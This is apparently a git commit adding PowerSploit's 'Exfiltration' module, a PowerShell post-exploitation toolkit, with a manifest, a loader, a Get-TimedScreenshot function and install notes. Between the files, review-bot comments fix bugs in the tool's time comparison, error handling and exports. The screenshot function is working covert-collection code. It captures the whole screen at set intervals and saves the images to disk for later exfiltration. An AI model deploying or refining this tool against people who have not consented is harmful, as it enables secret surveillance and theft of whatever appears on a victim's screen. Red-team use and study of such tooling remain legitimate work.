Added 'Exfiltration' Module
parent
b53b6a03a5
commit
b3bbe03e93
|
|
@ -0,0 +1,87 @@
|
||||||
|
@{
|
||||||
|
|
||||||
|
# Script module or binary module file associated with this manifest.
|
||||||
|
ModuleToProcess = 'Exfiltration.psm1'
|
||||||
|
|
||||||
|
# Version number of this module.
|
||||||
|
ModuleVersion = '1.0.0.0'
|
||||||
|
|
||||||
|
# ID used to uniquely identify this module
|
||||||
|
GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
|
||||||
|
|
||||||
|
# Author of this module
|
||||||
|
Author = 'Matthew Graeber'
|
||||||
|
|
||||||
|
# Company or vendor of this module
|
||||||
|
CompanyName = ''
|
||||||
|
|
||||||
|
# Copyright statement for this module
|
||||||
|
Copyright = 'BSD 3-Clause'
|
||||||
|
|
||||||
|
# Description of the functionality provided by this module
|
||||||
|
Description = 'PowerSploit Exfiltration Module'
|
||||||
|
|
||||||
|
# Minimum version of the Windows PowerShell engine required by this module
|
||||||
|
PowerShellVersion = '2.0'
|
||||||
|
|
||||||
|
# Name of the Windows PowerShell host required by this module
|
||||||
|
# PowerShellHostName = ''
|
||||||
|
|
||||||
|
# Minimum version of the Windows PowerShell host required by this module
|
||||||
|
# PowerShellHostVersion = ''
|
||||||
|
|
||||||
|
# Minimum version of the .NET Framework required by this module
|
||||||
|
# DotNetFrameworkVersion = ''
|
||||||
|
|
||||||
|
# Minimum version of the common language runtime (CLR) required by this module
|
||||||
|
# CLRVersion = ''
|
||||||
|
|
||||||
|
# Processor architecture (None, X86, Amd64) required by this module
|
||||||
|
# ProcessorArchitecture = ''
|
||||||
|
|
||||||
|
# Modules that must be imported into the global environment prior to importing this module
|
||||||
|
# RequiredModules = @()
|
||||||
|
|
||||||
|
# Assemblies that must be loaded prior to importing this module
|
||||||
|
# RequiredAssemblies = @()
|
||||||
|
|
||||||
|
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
|
||||||
|
# ScriptsToProcess = ''
|
||||||
|
|
||||||
|
# Type files (.ps1xml) to be loaded when importing this module
|
||||||
|
# TypesToProcess = @()
|
||||||
|
|
||||||
|
# Format files (.ps1xml) to be loaded when importing this module
|
||||||
|
# FormatsToProcess = @()
|
||||||
|
|
||||||
|
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
|
||||||
|
# NestedModules = @()
|
||||||
|
|
||||||
|
# Functions to export from this module
|
||||||
|
FunctionsToExport = '*'
|
||||||
|
|
||||||
|
# Cmdlets to export from this module
|
||||||
|
CmdletsToExport = '*'
|
||||||
|
|
||||||
|
# Variables to export from this module
|
||||||
|
VariablesToExport = ''
|
||||||
|
|
||||||
|
# Aliases to export from this module
|
||||||
|
AliasesToExport = ''
|
||||||
|
|
||||||
|
# List of all modules packaged with this module.
|
||||||
|
ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
|
||||||
|
|
||||||
|
# List of all files packaged with this module
|
||||||
|
FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
|
||||||
|
|
||||||
|
# Private data to pass to the module specified in RootModule/ModuleToProcess
|
||||||
|
# PrivateData = ''
|
||||||
|
|
||||||
|
# HelpInfo URI of this module
|
||||||
|
# HelpInfoURI = ''
|
||||||
|
|
||||||
|
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
|
||||||
|
# DefaultCommandPrefix = ''
|
||||||
|
|
||||||
|
}
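Review bot: `FunctionsToExport = '*'` and `CmdletsToExport = '*'` export whatever the root module happens to define, so the module's public surface is set by what gets loaded rather than by the manifest. Listing the one function this commit ships, `FunctionsToExport = 'Get-TimedScreenshot'`, makes the export set reviewable and keeps any helper added later from leaking out. The commit appears to add no compiled cmdlets, so `CmdletsToExport = ''` would match the variable and alias entries.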
|
||||||
|
|
@ -0,0 +1 @@
|
||||||
|
Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
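Review bot: The loader dot-sources every `*.ps1` found in the module folder, so any script that ends up in that directory runs in the importer's session on `Import-Module`, whether or not it belongs to the module. The manifest's `FileList` names only `Get-TimedScreenshot.ps1`; dot-sourcing an explicit list, e.g. `. (Join-Path $PSScriptRoot 'Get-TimedScreenshot.ps1')`, keeps the loaded code equal to the shipped code. Spelling out `ForEach-Object` instead of the `%` alias would also read better in a module file.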
|
||||||
|
|
@ -0,0 +1,99 @@
|
||||||
|
Function Get-TimedScreenshot {
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
|
||||||
|
Get-TimedScreenshot
|
||||||
|
|
||||||
|
Author: Chris Campbell (@obscuresec)
|
||||||
|
License: BSD 3-Clause
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
|
||||||
|
A function that takes screenshots and saves them to a folder.
|
||||||
|
|
||||||
|
.PARAMETER $Path
|
||||||
|
|
||||||
|
Specifies the folder path.
|
||||||
|
|
||||||
|
.PARAMETER $Interval
|
||||||
|
|
||||||
|
Specifies the interval in seconds between taking screenshots.
|
||||||
|
|
||||||
|
.PARAMETER $EndTime
|
||||||
|
|
||||||
|
Specifies when the script should stop running in the format HH-MM
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
|
||||||
|
http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
|
||||||
|
https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot
|
||||||
|
|
||||||
|
#>
|
||||||
|
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Mandatory=$True)]
|
||||||
|
[ValidateScript({Test-Path -Path $_ })]
|
||||||
|
[string] $Path,
|
||||||
|
|
||||||
|
[Parameter(Mandatory=$True)]
|
||||||
|
[int32] $Interval,
|
||||||
|
|
||||||
|
[Parameter(Mandatory=$True)]
|
||||||
|
[string] $EndTime
|
||||||
|
)
|
||||||
|
|
||||||
|
#Define helper function that generates and saves screenshot
|
||||||
|
Function GenScreenshot {
|
||||||
|
$ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
|
||||||
|
$ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
|
||||||
|
$DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
|
||||||
|
$DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
|
||||||
|
$DrawingGraphics.Dispose()
|
||||||
|
$ScreenshotObject.Save($FilePath)
|
||||||
|
$ScreenshotObject.Dispose()
|
||||||
|
}
|
||||||
|
|
||||||
|
Try {
|
||||||
|
|
||||||
|
#load required assembly
|
||||||
|
Add-Type -Assembly System.Windows.Forms
|
||||||
|
|
||||||
|
Do {
|
||||||
|
#get the current time and build the filename from it
|
||||||
|
$Time = (Get-Date)
|
||||||
|
|
||||||
|
[string] $FileName = "$($Time.Month)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Day)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Year)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Hour)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Minute)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Second)"
|
||||||
|
$FileName += '.png'
|
||||||
|
|
||||||
|
#use join-path to add path to filename
|
||||||
|
[string] $FilePath = (Join-Path $Path $FileName)
|
||||||
|
|
||||||
|
#run screenshot function
|
||||||
|
GenScreenshot
|
||||||
|
|
||||||
|
Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
|
||||||
|
|
||||||
|
Start-Sleep -Seconds $Interval
|
||||||
|
}
|
||||||
|
|
||||||
|
#note that this will run once regardless if the specified time as passed
|
||||||
|
While ((Get-Date -Format HH:%m) -lt $EndTime)
|
||||||
|
}
|
||||||
|
|
||||||
|
Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}
|
||||||
|
|
||||||
|
}
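Review bot: The loop condition `While ((Get-Date -Format HH:%m) -lt $EndTime)` compares two strings, and `%m` prints the minute without a leading zero, so at 14:05 the left side is `14:5`, which sorts after an end time of `14:30` and ends the loop early. Comparing dates avoids this, `While ((Get-Date) -lt [datetime]$EndTime)`, and the `.PARAMETER` help should then say `HH:MM` rather than `HH-MM` to match the example. The `Catch` block has a second problem: inside double quotes `$Error[0].ToString()` expands the whole `$Error` collection followed by the literal text `[0].ToString()`, so the warning needs subexpressions, `Write-Warning "$($_.ToString()) $($_.InvocationInfo.PositionMessage)"`. `GenScreenshot` also reads `$FilePath` from the enclosing scope; passing it as a parameter and disposing the bitmap in a `Finally` block would keep a failed `Save` from leaking the GDI objects.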
|
||||||
|
|
@ -0,0 +1,12 @@
|
||||||
|
To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
|
||||||
|
|
||||||
|
The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
|
||||||
|
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
|
||||||
|
|
||||||
|
To use the module, type `Import-Module Exfiltration`
|
||||||
|
|
||||||
|
To see the commands imported, type `Get-Command -Module Exfiltration`
|
||||||
|
|
||||||
|
For help on each individual command, Get-Help is your friend.
|
||||||
|
|
||||||
|
Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
|
||||||